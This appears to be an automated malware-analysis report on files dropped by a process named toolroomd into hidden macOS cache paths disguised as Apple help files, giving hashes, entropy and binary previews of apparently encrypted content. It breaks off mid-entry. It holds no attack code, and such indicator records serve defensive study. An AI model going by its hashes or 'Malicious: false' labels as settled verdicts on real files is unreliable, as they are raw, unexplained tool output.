SHA-512:	32F02E39CF00F55E9FCAFBABE1E38C5DED7C328FA7D25E023AE54D24553361BABFF76786A35CBCC1B7CB93A6FA051A6F4ECA130CF64927598FF5258A28501D48
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A........$.CL.J9e.`".\|...uJ.L....jj.......3.[..sf..}..$......]..y....+...fg9.r.E.I....Qu.&.8..w........\|..n..7./.O........h.Y...Q.M..E.,._9~..a.E..u.h,...j.K...<.\|.S..Y...g~.Lb..._.....(.]U.7....zPX..Co....9....O......l.g.......r.K...e..R.....JQ.>...x.."I."]r..Z..Ck.k...<D.n.3N^.3.\...a.....3k....FZ6..)....D..[...F.B........)s.<...8.?...c..H.]bf..20..c.2....m.VJu..y7.d.:...G.V.........{.A"m.......5......^....>.[.....E.".E.qp......!.}.#.....op0.......S../..L/7 m.Fl.2......A...../.Z\..w.+E...\mB...-.\|u........n.."_S....<..sG.G.^....w1.....<.]Y....f:rJcJ...l..E.v...+.l.....(.....j.U..!6p.......s.....c....!.......i.R...]na.<..i......p.d.H...NiD@\...&.".... o...=x....... ...a;G..K..-l....~.......c.>..m....J.u...'X.?....f\|v..+f...j laD....{d."....m<N....Q.5..m%..D.....B........n9..$.0..%.nOl.Aag..J.Q.v..(.....'.T.J...#.%$..-......^Iz>..

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AppStore.help2.3.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6626
Entropy (8bit):	7.933337537152063
Encrypted:	false
SSDEEP:	192:LDO0u0dtlSZipl0uKJQsw0Bxns1AxXp79/m9:xu0LFplJSTnB6
MD5:	CF19F0F06FF030CF63B163D0856F038B
SHA1:	C340E87179A02CB7943CA0E39A7C813CD2FA6095
SHA-256:	3F551241C000D715767369B9B4CE3B53AD7DA172183D26475215151FAF4A4915
SHA-512:	5363782519A15F5003075DB63E55C3D754B93CA8A1800CB04BC1ADA1BCEC6B947CBEAF68C7794ED8C93C79D53B4B2B29DECE4BB6E3536816496BD90552FA35E3
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A........FB..G(.T.?...,..19&...8.. #o....R".Z.....^.\.M..k...Oc......".....3Y3%./S...T..8.f....~K....&.#..<.g..w.....zD.Mf.z%px......7.!..h......M. o.+.....m...F<..{.-.-+B./.R.q.E4M<4..j....g?.C?...p.4.j..u.-n..&...y..u4...aA.xS7E.6<.."a..X..V......Uo...o.T.\|k../.R#.x-h.{..DZO'...-...$Q....'M....)....I...Cw.Yrh.............x...+..d..g.#.[..s.9.+_.:.+.Ue.....8r.....I..y5jS!...R.z($.IK..P.....` ".O.z..2.,...U.1}5..j1.C..x1..<0.~...7.......sL..Z._y...f...%^........@sN.F.........I..W..l4......\|m./..r"...IQ".\t.&.7.M.Gn...S.0.>u..+9M..4.]U...c^..........ph.l?4F...BF....&....+c..R.T..4..0whO...E....&.Y..6......h....Fr.............,.A!0.........>>..kp...O,......6..)cA..RW.I4.z....,..bu.g....l......N3.{mr.....z'......i..KTi..St.3.&..j_......c./.....r.8...r..?.....lc.7........'..ZS...6.I4.?w.....fU..v..$Wi..\|.C.(,.>....T.\|...8.S.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AudioMIDISetup.help3.2.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10162
Entropy (8bit):	7.961992670073653
Encrypted:	false
SSDEEP:	192:L9PMLDnVyRg4XK9+nAU91I+Iq1VqQwzAuvwwzwRRDK0Cfsyb73/d:GLDnVyO4XC2K+IqI3NzCRGWm73F
MD5:	DABD75C5B7939E05DD0657E11FDC8803
SHA1:	BDD8732F8C6EC5E3BB545EB7C10E1366B5B3C683
SHA-256:	9B437E9C4E62803557E4686230FCA53621D3859BE96E7337BA00EF537B516A58
SHA-512:	095781D32A830099867C8C4BC0F8ECC08DBD87B687788632DF9C1F71F1A3C7043ECAB71A08A45A7472BE6C33AE01373FA8D9724E17AF74ADEAED15D22389817B
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....c.X..:.....!.q...,..19&...8..e.S#sU..4.....3.=j..W..W.......M..2...5c..y.0OF...Vc$...].0....Z.....v~p@4_%.fXN..@-...=.IT=./3j.hm~.m...l\|.l]~...a.....,.@oh.....y.!.b.....c...wsC.v......CY=.....K.uO......N."...!..........O T.tD..$.G9....7..q.V..J..Iy...L.~.\|i........rv.lK.FF.t.8........u._...Q...........!6..w..".eU..uK.R\|..l!.9`Sq.,Z$q.M..'.....Y.R..#gf9...pI...}......oE..&.SM..\|2..-..NK3.%.3N6J.u.6...~...D.&.b..^..B.........n.G...\.d...E..cT.@...AT.<...7..G.'.....X..{UO.Hr h.C...N..P.=..Ea.BK....>=......8Y...M..O..J.WR<.f.a.l...K....I.a...q@.=8E.j...i..e..C...f.T).]d...NcG5..A..b...v...p.0h...I..1...nJb../t..1......2......)<z.%....9mwC;9.vV.-J...x.9.uy'^..nYZ...{f..;C...B...4n..^>.,.9+....)..R......<gH"..cX.o\| ...e........;...i...p...g;...}./.-..ru..H......\|q9h.1..}..]r....u}...\|.!p........%Y..7.......=.e..^....?.X.-u..?.H.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Automator.help2.8.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	9866
Entropy (8bit):	7.962665614917594
Encrypted:	false
SSDEEP:	192:LED3GWZ+hmAmBb3jhWLvuuF2FuYJg1bAA5m8AndL4EVWr4c:oD3GWZWmAUdWjHF2oYyCwm8AndL4mG1
MD5:	97FCC3733123DE5A05F578AF57D7CF46
SHA1:	B697D849B335914B999144508EC9BFF35ADFC7D5
SHA-256:	75B1122B69EAFAE1F28F4996F67BFE21BEB1D1D6FFD914D3DBC669D231A89115
SHA-512:	82EE674FEA04AE85801017B1FBDF695CAA1E2FDBEAB8356D28831A19B801A5EAA61BC3BDB617A93114730225101ADCC45D093C0D8B61EC76754AAE1379215439
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....k.J.e..[."..=....,..19&...8.......1#._.".b..DQ.vV...VE.e.3.;..R.U..X#'....s+M..ZE1.h..k.W.xz..j3.\|.kgXn^=:..vlQ.......Ic..../..P....bGT.@tB.nE..o.D.J.E..N..i..m.jH...HB..%...\|.Q.6.w.....,.J....'.1.ww..W..........ih..L..%.'.q...G..6<.."a..0WAsew..6<.."a.........T.x.<?.^/.~..eNr.=.X....h.?..Z..A.i..."%.v.1Z<..6...Is.N};.g.P._u..cT.W&.;qf.._M....\...m..z9.r...~....~E.O.:.`$.u.2.....%{.C..;...E.F&.H..#....#..6z.RU6+.T:..9.\.........ZT.}..L..x...M#..f..8..}m0...."... .%u>u.8...H....u."....J)[.N.............h.b.....v...z...t..L.............l.......Z.X.^,T............X..i9.....u#.udt2.WU........yiQ....e..]_t^.M....b.K-..._.......~..]...2~.g7\l.0.=.{...[.7.!.f.....m..\|..^@....'..........>./.#.+X.#K...:..k.}.8B.`%.RY.-..&.@...$...nf.R.o!.2..Z..-..H5q....m:(..{.?..{(....Jd"}.W.1.R..F....a@[..@..Q./~PE.uz.r\Qrt..{.X....V4...x.e..'U3.4P.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Console.help1.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6922
Entropy (8bit):	7.938548477687751
Encrypted:	false
SSDEEP:	192:LaDP0B8Ki8SOnW8gPa3SmNtqu9iOH8gJxdWYOk7sqrTI8lhn:OIBxW8aaCEQuNH8gzdjJ7sETI87n
MD5:	91195B05F89D4507BDEBD23DB86D27E5
SHA1:	BA911E3D639462F2708A978BD83AD16A02A9AA45
SHA-256:	EB07104A2C685D463547BD062EC1FBF31E4B5AA4FEB65AD74A0976A2C2FA4A9B
SHA-512:	9A880352D0F64AAAA88796905C5022389D596753FC43D7BED21F73EC7E29E12CB7C4803ADBF9FD3EE6700511842B99282FF181171371B2A0FF0123923A747CE1
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....1.K..G..q..s..-...,..19&...8.hD[.....D.rg.}0'u...6}..[.Xv.%.B.]B.7D9..o......U.-...]..d..GG..........AA....>.K.s...$G..vI.G.P....(r......e ...=...a4...M.b`.W....g..\.Sz....l..Q..^......d8t......'(..o...mk.y.M.a...2c0..=.,v.k5....w.G%/../+Zj$nA...".,....M.....=g.......ce..ux.&...p.....s3n.....io.j....+.4........L.xZ...../r.Y..m.;...m...T.c..{.wTv..E.l..A...KrcATO2.2..d....n.6.v...B...T.$..`....2].:T],..<h......V.xV..Z....(".n}3!.W`.'...m..i..2=3Go..E.s}.z.P&{i.#=..9....X....w.MC...}1....]...<8....2..6W..-....3x!.4. .p......\|>.X\|Z.pv.....n..2.....b....(....v.^.Zm.T }......"..F.=..V0...&a.....LdO....Q.x......ItAR..t....6.._J..W..%.J.>)..$Dn.R....R\|a...}.Y.#..p..C....I.L.t'..Q....k......VV.;W...&G..G&.Q.9Q\|~.`.l...0.....qH#..oKfvQ+^.GY.....,..x.".]x./..,.Y&..q..t...C.i..?..............^>..X...T..":9$..(gn(.k.;.u.....p\.-....

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.DVDPlayer.help5.8.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	13802
Entropy (8bit):	7.971508866988323
Encrypted:	false
SSDEEP:	384:2dda4oBSL5Yt2nTEXRQ/75s5570vQsFPXE:2i1B4HnTEXRS7O51MP0
MD5:	7A8093D426854BA024F513A75D8D89DD
SHA1:	FBD61D672B5EAA1975F57C9262B85EC37531E98F
SHA-256:	2DD74FEE07BD3EAC13BB6B8603273998F599B49C1BE171BDB3B2B1916B3338E8
SHA-512:	AF0BCAC1377AA6001900D4308464138DCFEA1653CA920F62AF402AD8E6B8F29E2C642494B7CB96E3A1F700C375714B29AB8D122226D270B73575A19629991CB5
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.......MYq.....&......uJ.L....jj..wm.i9u._......w.`k...),2.9.@L...q;.y.>.m%...}..yi......N...;..)..X.]P..>.....6....GT..w...Y s.0...../.32.'cK%.~ ...@.\..g....@....:K......0.......S......}....=...P./.A....K.Y..c..U.j..F~..g..\..aM...........d..w.......2....+<.....^5?X..%..v0.i..Z.,.....SH.q.."Qc......~.O....>q...k...lP.g..}.=Z...n.9...}.n....Q.o.I..,.,n......S...ES..:..?.^J....+.IX...V...a.'.Y9I.X...p.~..i...-V.j.i...#......Xje..h.P.^Y:>+..%zS......"..h.../..}....S^..znR..\,...}.j{....@..R.sX#..h..=@....!..d.>;...\|...@..f.......ux...o......r...a.d(~..E.y....%..m..n......O..X..6.+.!{6..=..X.ROW.<....p&.B..Yz3.#...........<kr.Y.+-.G....b..SJ../..EQi...";..^%>.....$l....I..X.....F%'Ss.....k.a.K..p.yQ..;rw.8..'.3.y..h...*%dS.<{.M......c....bk.... .8.....tF.E,..Z....6......R..dL...\Uj..ER...[....J...._q.J.r...7..1`.Pg..-...$.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.DiskUtility.help17.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	14274
Entropy (8bit):	7.976729506160439
Encrypted:	false
SSDEEP:	384:l6uLRQk18WLjqyo5AK/2Wf1yMqWoHHH0GUO+a2GfUn:XQcfE5AK/nyzXHHHTOaby
MD5:	3420F9675C9F641FD41B9EDFA9218EFF
SHA1:	6BC51A8AFE2D69DF2C324934FD9B9E673B898D9F
SHA-256:	1176C2D7EEFBBE5292B5398B7A298B77C84486D4652B51C2D9A3E2CC6697C08C
SHA-512:	DC40D330089DAF5B6636FA47CFF9C381AEBE07B573807B1E4DB02821E18799F1E36CA93C9B269B3F1459296DCCD1C47952C0178187EC1CE86F96E1459E1C2FAF
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......*9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A........=..\8.5........uJ.L....jj....R.....v....J...h.D.7.^...D..m.".........:%{..K..+&s.3....L...2.\..@...d.$....T.......x......-G.....K..k.1..e..R.S.?t.^....~....7.....BB.nd.....e.@.m.....c...>.R.....w...'.`k6.T.E.....2..Ve.F4......G.R..]....#..R[e...#jLw.......@s'.KD@..>...........{....6A.....iU3c=..Y...z.lI...A~S..q.9#.s.f..',]\...v$....e.........Y2XV.\........E.vI.H..Fc~.d.....g......Q$....0...$...@6..\...)t..4.SG.T.J.....o.....D5_.?.M>..S..\.7..-.(#).;.....(.L.xIm=..+..N...?<..LQ..i...g...$............X..].i;.iV.B..7.....U..i.gv.....<Q?......O.z..%....y.{...?.A(<<..<Z..2....]9...m...HJ!...s \|...........B...U\}.9/...0.?.`....I..eb.._.6k7R=...1......>.n.&y..W .q.....UKl.b.E]..-!.mk7_....qrA..d..U_?.S.g..l1....Dbs......m..o.}.q]:0......v.$_.l[.L7.i.1.#`...6....B..(....Oi.lD7u.u...y..I'y5..:..e.(j..N.}J.w..)..K@....)......_$.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.FontBook.help8.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	5994
Entropy (8bit):	7.918245729509221
Encrypted:	false
SSDEEP:	96:L8xI7je0jsUlpac4ehXQVbQknoSfxDw1g7/qAM2lGCIRu/7zV+AgFuBu:L8CXsc4aQVfxVy1Cou9y9
MD5:	CEF308D3CA65E51FB6D37D23EA88CE54
SHA1:	9B58F6F698130836CAD820BE4457D5119E802D1D
SHA-256:	1AF81BCFFB30571388E9D4E09D8433EC076B48D77429DEA3F0D971C8EA189B2A
SHA-512:	0234F7948A117EA952D62CEC1A1CB05DFF69BF426FE25D1A2521D4B7C36DC791C302F607629C54C95725A94E0C0081D77FE1C99E4B9898AB71282CFD7ADD2985
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A..........N.TF+. ..I..,..19&...8.-.5.t..\.N.........._aM..._._]...N..#..\....Ds:..\r....f.LW......dm.q....._..nC.....\|<...C;3..k...~.....J..-...c....-P.D..1ig....$.%.w.......A..6i.,......Oc3W>{.....RU\|.....,&.x........[...........ZhO.-.!!..e2......"l....dD#..\...@.;4..#....m.....$.>. .@....q[mxf..S...m_t...."..zN.3.$.c`?^o...t6ip........../.mrFP..U...k>..Q....9K..u.".;.......S#....}.-.e...V.$A.....b.2.y..a..N.Cw..+.`.r..7..'..G.f..y..B/uN.N...E.c.O..........w.X.N.5..}(D$...;.."P.w.P\|...xPgl..M0{..N..9...Py....GE.)E.j._...\|%.x.VW:...+.&..P.......w-/b....gj.....U;U.%b.=..9..YJ..4.....A.F..= ..&.v.}+.\......YPV.\]g:.u.....n(...~.U...70?.;F@..q..!Gig..h.FV{yh.Pd......Jn......<..y..I...._....7.D5O._..h.61h..?..;.(Q..k.k{.&.E.j..=.....t..PF.!Zy..\...._._....I6.pz.1H.$.....^d..u......1..c..... b...N....'..Mxg..s.4CI......C.x....^.J...?...S\|,s.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Grapher.help2.6.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	6154
Entropy (8bit):	7.9240251990242525
Encrypted:	false
SSDEEP:	96:LSLYoBXXNQTyNFzu8Pbi+Q7xOizMcQgeTUk37KxZ0EgS3XvihUGu:LUgwzuybcQdge4k3W4EdaQ
MD5:	ED9642DE93601D2A916B923426882BAE
SHA1:	CB50B12939E78EDC6FBE32ECB8D97AA84C215DE8
SHA-256:	BCDEA994F12DB353A71E996EB004091A6DF002B1137677D59B8EFF088D8DD4CF
SHA-512:	30188EEE257E225F952CD3E8E1968A200820B307A3CB9CE3257570A70D9F80992060BF4241F7887309174DB4955C36FC191C7610CBEEC356CFB44E2AD196DB32
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....m.n3Ku......yM....,..19&...8.8...VF..\.:...d..Y.rjh.R,...qr....C..U....U.KS....N..y9q......,.GkI..Q.P%....6$.6.YT(h...{S.vY.UW..7.d.Ic.3....8...5o...Gn..^......r9..H..Q..O.]H.,^A..-7.G.6<.."a...!.p.......gA.g...ux..6<.."a..2.".S........=.....V\|chf..d<d..3...-.<...Q./@..8....d....._n...[.;.&.K..(.......\.Fb.v..fLE.M.Wj..7 ..K0..A..D...-.g.S....J.t..`...........f..`D.Y.'M.H.M.j^.q....4A....)kDx....]...oN..\E.N.f..P>..E..JZ1..<V7.9w..(....ly.w.c..Vf..v..........Q...(..:)...V.+.....r..kQ...:7xY.#.!r..$.C.Q..\|.c.y..G....9.{....0...;..4h.z...k.^{O.RR.o.TR...-....L..._..d.2.4[d......=.s...Ck.,.p.(..k...!8".e.Y.Re[.8Cy....v\.B.rr3....7.._};t.I\.O....+.G..Z....)^...b..b#.@.....6......1....u.gfl..........&;.S?.L...(...TiPhp.%s.a...v...X.^..j...rT~...a.Fq_UX.+.u..Jd..../.H.O@...h.\4X!..#......z...0..../.......+.?....A..........l..d`N....s

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ImageCapture.help7.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	4242
Entropy (8bit):	7.882781306805891
Encrypted:	false
SSDEEP:	96:LkTn5auV1RbtJFygC0/fbwDcFOZDo5wGvAVf8G/0/n2u:LkT3V1JPiQfbwDbCVvAVfx/0/j
MD5:	2A5F92C4FDE2804AA3912970E2FBDD53
SHA1:	B74A44322E462CB25E9976BB0ED39243983AFA42
SHA-256:	9B8B1E1F593FCBE8321C9DA5C11200D0447867B61DDAF1017D8BB02C41A9A018
SHA-512:	1781A0A7996A9E9ECE0DF18CD2990DEA8552E349610A50407AE3E926EAE8223AF2AFB063A8DAF4D0B23D147847BC8CBAEDF06584817254F0469EF955FCDC9FB6
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.......[.\...a....]..,..19&...8.D.s.Z#...k..._yUze..T...;K.zdH=.-......j..K...x........N....}h..p:......z..E..k........_/.L<...#X`.!.#)5....g...O...W....0I.2.Zly.h.....Q.;..@.k..TZ@..fU.jC.k.+P.Qco.4.Ct....SquA.....A..fq.h.!p........ ..V..I.Ybf....!.LKD.hj.#."o..d<..h....2X.R...3.n.x.'1..D........v...^.x.....;n..UK...w..>6).a..o.H....A..Wm,-..(........Ze.&...m.d....p........t;M.?..m..E...x..P4..$...s.~.^)...!x.WM.&.....Y...e.v^..s..k.M..Xf..).Vq(.E.\|&..LY<.":.q.[.....2q#f..).Si.J...x..X...{.a#.P.T.......q.......N..Xm.=...{.5.).....Hg...3V...d\|.V.N..6<!i......h^.z.P@.....`.bl..k.i.Q......&...um..{.l?..M..n.S>.4.5.$.7.....u....2....=......z.......=..J.......m....b.Q~...L.o...6('Gw'.N.{?O8.Fx.....E.2.S...,..d 1.8...O....<-X.%b.....H[.ygvs.v..QE.5`.*._.4.i.@.Z.]%......e....m...eI.D.....d..ea....O.L@..)...\.....x..Z.[..8.5-.Z24.l..)..4.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Mail.help11.2.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	40628
Entropy (8bit):	7.9935655040139775
Encrypted:	true
SSDEEP:	768:vLOhjlQ4T5iFfUKlY5JjUBq2ywiH8iqKxLIQaVmWZ:vLOh1T5iVGJQBq2Iciq/7Z
MD5:	2A46F93A3FED48EA56E7F9F3E4BA5318
SHA1:	64A329545B208FAA3497704245FBF26E9417A169
SHA-256:	1C131B4EB828D32A956FE30848FB7A0E0297F12DB6F6883D7CB85BD52C2FD8AD
SHA-512:	6ADCB87CFE9C5F1CFF7F649155B82FABF84FE524AF25B6DB8E5B0202ADAD09B5A9AC8B6FF7CF127BF096A8A7A9F722B8F929D70CBA48547A8925EA9753F87CB1
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......*9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A............k....x0.6.....9H1...M..cSy.J.c.-.A...,.D....q.A"&2..<...?.r9.q.?+..4\._....[v)..X.0R.i.8.g.-t:r(.C.RE..%...@.KW.x.....B.V.(.3;....>......c.%9B.........R..8/2....e.a.$...['........g#r.../h...._../m.9vr>}.h....b7$34.m.4.....a.J).?....\.....3Oy.O..sW...9.....r..\|x,..@.....7Mk...97.z.T.L...N...E..".TD.L.nbF.Y.5Py...Y.V...!..vj..6.b#./O..:..+Bx.F...Bf...T)...0@.J%.?.9c.c..2:..o.6<.."a......$5.l.b.....{..7.....L..M:.x..........q._.N!^.)]A...kr...Kt..D[...NT.........p..)^zt....F..H....+.z...?.Evu.....:@D.......6......R#.t.;V.`9.......cR..G<...\eR...63xSl.......L.W..N=2..le..7j.f.d........T..8q..e.y..h%....V;wh..A.0~.m.%3J....R2... ..5X..1..V.\.v.J[.......4\|h..;}..{.,}..{..SnZ$..H.f..BW...y.6f.;L...G=..j....;.z..!.....@.e`..MQ^.o..R....f"....2..m..n.0......%1..bq.+...5...\....aQ...n%[.......~..).\|..\|3.N..........s..{2}c..4l.a..yuP..Y

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Maps.help2.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	7226
Entropy (8bit):	7.934535956026428
Encrypted:	false
SSDEEP:	192:LKRQz5a5x6/oeR+lKwCHyWnE5UKg4vXP8h0L:GK6xMotliNE5FgMXPw0L
MD5:	2DB8FCFFFFA62E33BF24AE5162F9B617
SHA1:	1E66107A4F8ABE6CD874262D5AFDB1F4A74F4640
SHA-256:	05165EDE0DC53202A0987B067D2BF3DB6173579382AB66D5336983C034E74BAD
SHA-512:	E5C2DC53A7D6A9722DA1702DC9AAE1C30FA9A26B8851618DDA4E02B3F9F2303AFD5AD965BC8678F815D6A9B34584AF3C720A1B05486D0C42AEFD23E084DFA737
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....sP^&3....A@..j...,..19&...8..E.?-....{..Z..o..0.J...LHg...A5.f9.......l.p}:\.L.i....zF.I^....\|...:..'.....].M.-nR,.$..H.7...aAI..a.:Y.....;..O.xG~..Q.N./............5>.<M.7\%Z......K......65R...&. W.U..iT.....v.zlQ..........l>;.\..Ehk.......]..]l).7..}..M.._@..l.Z.8.URIq.._...uGL:...{.i%.Sc.?u.'Z.1..E)....t....W.0T.~...'.Y.d.^...(.-...5Y.....a.h.GK._>.....\.%.F..9\.J3.. B.1.1......o.....^.\|B.QX...E.\..\..3...c..:....7.;.5x.."..~.-`i..g+.O.......[.S.o.O2.P.4..;..0...I.z....1......{...e.M..e.<.W...W'......\|...0..xu.w..}........A.f......2.".G..5....68.....x...Mdo-#..K.L`.)gg....S.&W....4.t.u:.Kg.TP=....../....~.....'.J.s.`.)...}..x..k..N'2.q.y......... .LM2.k.72....O...z..!..u'X,.;.3...o.7z..y.n........#./y@+...,.<.o.e.q...T....g..A..7..a).+.....4..[..&..R..`O..p.q.Y..e7..P'v.<MD....g.q.P..`..w.I..;./._.....(..`f1H%dB.h......A..

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Notes.help4.5.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	12690
Entropy (8bit):	7.970252629248908
Encrypted:	false
SSDEEP:	192:L6A0XLrAMasb/CBXAiw2/QU9KZJYEMTnRxTU3afL7jAFTgUF1+ShBI7mrWI6ZIpm:bmL7KBXAiw2/AZJYEMTmafvj0FpBXyCm
MD5:	2E334BC508B0327D3779A7189D89F569
SHA1:	2D8040E142B517C6B0E0EEC0C85672B72B0EF230
SHA-256:	D95E109A10CF9A8430076D8DC106E60610CE4C2BAEF9DAAEF631F43CD1099DF4
SHA-512:	AB5D363D121E393EBD9ECA2519D332DD6D8120CE8766E0E5BEC79C2E0722685C6986E4DA428805AF80117917185C4506EC02B6209E13B1246AC79DB758B573A2
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A............u7.F..X...uJ.L....jj...tF..,..\|.....XE.g,.z..#<.....k...(..6.....e.>....tV@..k..,}..N2.......3.b..E.w<q..8\|w!x..fr{N,.M....?.m:.T#3c....#og$j........f:^./9I..Lvq.%..Ut^.c.....#%Z.f......?.z".k...........N7.jC.[(.M.E.O....V...K.r5;..P"..jm,pW...w.1(...K&{..b..v.,..5nX'.m.S........Cc....-.8}.........-.......$[\......3.7....'.=...z...Ghf..d<d.V...an.......B..8.6...~....`...<Q.....L.2X....".UE...v;.s..Mqx0.YmcR...t...O.p .zmb.g....q.D.k.%...wU.......i^.......?c.....CI..u..o..Kx\\...4.....\............C.......sH.\|9G+...<...f.d..../.1........9%f...5..6Gdm..9pD1.b.a..V.O.....y.6.2.=...~..\..n.w.A..BI..%o.'I'.2..s.Xo.Ti..N.V.U...}u.t..cY.C..<..s...k....'.0D3.Z...D...vY`.>..$..4.....)?\u.rs...v....^.y.A.#z...-,.bF..Z....K.%0....*....L.q......KeJ.F.-.E.)....o....#..TD j..s..d...Tv..]..Y..q......"..S&.MD..^.0;.x%...&.(.$el.h.~U;.n..

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.PhotoBooth.help9.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	4866
Entropy (8bit):	7.89585834611664
Encrypted:	false
SSDEEP:	96:LgIBqx/jVsPFypqAHlRyx3cwU09Hr5UB27CZodz2W2dWgnN2sTIuEu:Lqj+9ypqKYxswU0l57CZazXuM2
MD5:	E4E3FF37DD732EF1AC0162B88D5F5E78
SHA1:	4CBFDE79393EBB9E2ACBC1F4804E3B2583883FFB
SHA-256:	073B8C1DC486A11032485D311B8A108DECA18CD028F293E8671AFDBBBF5B5FE3
SHA-512:	34C3F182AB9C0CA6157D94DA4E8E88035A7D2EC04250695EEA25F0D2A8931FC5BC4213257ACED4549CC1B9C2C7CDD2DF3201DE6C8905FE2FDBDA6EE6FDD7C36B
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....M-j.LX.YW7p...H...,..19&...8..m...........C...@-[.#...n.ue.W.lFol.N...?q^W.\..m.......g......+...d&...H..[.(.W..@.....Z..gH.k...!.._^.?..)......n....}MK..J.%5.n...._....j..W.m&M..q.....m 8cK9/.$._.t.].p$.oA..p...S.Va.....;e.`.iX..{f.L......U0.%#..z.e..Rw...{......@.2R...q.wF..<g...]..1+..J....z.@....YV..\.b.Ug^`..70.hmq$M...U%.2.~..k.]..%2..j..5...(..9oy...R.'...x..P. ........iyM....I.....)..%.I@..<.Q.+.E{...]..F.%4..#7U..lJp.i.......X......2...tG.+.w.O.~.o.....]j...7.:^S/.8G....3.2...?y)..P.\|d..`._..f...2.+......XpJr.....$....,....?-?g.....,Rg....e.>.9.......)..3..W.@*!.9..T.7.h.B.."..M^./...S....$..(..7....la.....P]Y.L....E.......K.0[........>...<X..#.9y....,..Wd...]....%\|c..R.N.y....D.8B.Y^A......-!'.l.v.G...J".p0d...c.....v.QvJ.?=a.4(W+.J.z...;...V.R..E...Oc.....g!..5w/.j]C.YVL....A......Rw..L!E...O.A...0H..!.0.. %..;$pS.

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.Preview.help10.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	17395
Entropy (8bit):	7.981728125858134
Encrypted:	false
SSDEEP:	384:h11FbOq4TtfS+ClKsQgLOZtYYzGqVQCF6GVAcAvGE1lG:nTbF4xfS+Cl/DOHxdVYGicAGEi
MD5:	CBCEF43C48B85AFA4667325575E706E3
SHA1:	BF3C9D721D51C6D9E5B60A703784FEB4B44D1F3C
